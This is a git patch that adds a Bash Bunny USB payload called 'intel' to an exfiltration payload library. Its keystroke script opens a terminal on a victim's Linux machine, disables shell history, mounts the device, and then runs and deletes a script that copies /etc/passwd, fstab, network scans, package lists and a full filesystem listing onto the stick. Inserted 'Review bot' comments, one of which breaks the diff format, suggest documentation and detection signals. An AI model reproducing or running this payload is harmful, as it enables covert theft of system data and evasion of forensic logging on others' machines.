From 54a1f45ae2d538e1ec6c1e7b5ee8cc2665d54e10 Mon Sep 17 00:00:00 2001
From: drapl0n tuxed0 <87269662+drapl0n@users.noreply.github.com>
Date: Tue, 8 Mar 2022 22:06:57 +0530
Subject: [PATCH] uploading payload intel

---
 payloads/library/exfiltration/intel/intel.sh | 67 +++++++++++++++++++
 .../library/exfiltration/intel/payload.txt | 56 ++++++++++++++++
 2 files changed, 123 insertions(+)
 create mode 100644 payloads/library/exfiltration/intel/intel.sh
 create mode 100644 payloads/library/exfiltration/intel/payload.txt

diff --git a/payloads/library/exfiltration/intel/intel.sh b/payloads/library/exfiltration/intel/intel.sh
new file mode 100644
index 00000000..a3cec365
--- /dev/null
+++ b/payloads/library/exfiltration/intel/intel.sh
@@ -0,0 +1,67 @@
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "Network Schema:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+nmap -sV localhost >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "Network Interfaces:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+ifconfig >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+ip addr >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+iwconfig >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo Storage Info: >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+findmnt >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+cat /etc/fstab >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "USB Info:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+lsusb -v >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "PCI Info:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+lspci -vvv >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "CPU Info:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+lscpu >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "Systemd services:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+systemctl list-units >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo User/groups: >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+id >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+cat /etc/passwd >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "Installed packages:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+snap list >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+flatpak list --app >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "******************************************" >> $mntt/loot/intel
+echo "Directory Structure:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+find * / >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+echo -e "******************************************" >> $mntt/loot/intel
diff --git a/payloads/library/exfiltration/intel/payload.txt b/payloads/library/exfiltration/intel/payload.txt
new file mode 100644
index 00000000..17965860
--- /dev/null
+++ b/payloads/library/exfiltration/intel/payload.txt
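Review bot: intel.sh has no header comment saying what it reads or where it writes, so anyone reviewing the library or triaging a host has to read all 67 lines to learn its footprint. A header such as `# Appends host inventory (nmap -sV localhost, interfaces, mounts, /etc/fstab, USB/PCI/CPU, systemd units, id, /etc/passwd, installed packages, full file listing) to <mount>/loot/intel` would state it. The output file ends up holding the account list and every path name `find * /` can reach, so it should be documented and handled as sensitive data. For detection, `lsblk`, `nmap -sV localhost`, `lsusb -v`, `lspci -vvv` and a recursive `find` over `/` launched from one shell in quick succession form a distinctive process-execution pattern.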
@@ -0,0 +1,56 @@
+# Title: intel
+# Description: intel(intelligence) payload collects detailed information of victims machine.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: GNU/Linux operating systems.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/intel.sh
+Q ENTER
+Q STRING /tmp/./intel.sh
+Q ENTER
+Q DELAY 25000
+Q STRING rm /tmp/intel.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
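Review bot: The header block documents title, category and target but not what the payload changes on the host, which is what a lab operator or incident responder needs to know. From the visible keystrokes it opens a terminal with CTRL-ALT t, runs `unset HISTFILE`, mounts a removable volume through `udisksctl`, copies `intel.sh` into `/tmp`, marks it executable, runs it and then deletes it. A header line such as `# Host artifacts: unset HISTFILE in a new terminal; udisksctl mount/unmount of removable media; /tmp/intel.sh created, executed and removed` would record that. Because shell history is switched off for the session, evidence of a run has to come from process-execution auditing and removable-media mount events rather than the user's history file.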